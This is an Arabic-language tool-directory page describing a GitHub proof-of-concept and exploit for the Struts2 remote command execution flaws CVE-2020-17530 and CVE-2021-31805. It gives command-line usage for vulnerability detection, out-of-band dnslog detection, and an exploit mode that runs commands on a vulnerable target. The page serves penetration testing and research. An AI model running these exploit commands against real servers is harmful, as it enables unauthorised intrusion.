Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-31805 — S2-061/S2-062 ثغرة تنفيذ الأوامر عن بُعد في Struts2 POC&EXP | Kitploit
أدوات/GitHubGitHub/z92g/cve-2021-31805
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubz92g/cve-2021-31805

CVE-2021-31805

S2-061/S2-062 ثغرة تنفيذ الأوامر عن بُعد في Struts2 POC&EXP

عرض المستودع
526منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-31805

1.مقدمة

ثغرة تنفيذ الأوامر عن بُعد في Struts2 (CVE-2020-17530&CVE-2021-31805) POC&EXP

2.الاستخدام

  • شرح المعاملات
root@kitploit:~
-u 目标url
-m [dnslog|exp] //默认有回显界面字符检查
-n [s2-062] //默认s2-061
-s [windows] //默认linux
-p 漏洞参数
  • الكشف مع الاستجابة
root@kitploit:~
Struts2RCE -u http://127.0.0.1:8080 //默认s2-061检测

image

  • الكشف بدون استجابة
root@kitploit:~
请自行注册ceye,并配置好ceye.ini
Struts2RCE -u http://127.0.0.1:8080 -m dnslog -n s2-062 //s2-062 dnslog检测,检测速度跟网络和ceye服务器有关,不同url需要清除dnslog记录,否则会造成误判。

image image

  • EXP
root@kitploit:~
存在漏洞情况下,可直接输入漏洞参数进行验证
Struts2RCE -u http://127.0.0.1:8080 -m exp -p id //s2-061漏洞,参数为id的验证,输入q退出

image

3.إخلاء المسؤولية

هذه الأداة مخصصة للتعلم والبحث والفحص الذاتي فقط. لا يجوز استخدامها لأغراض غير قانونية؛ يرجى الالتزام بالقوانين واللوائح ذات الصلة. لا أتحمل أي مسؤولية عن أي مخاطر تنتج عن استخدام هذه الأداة!

تنزيل الأداة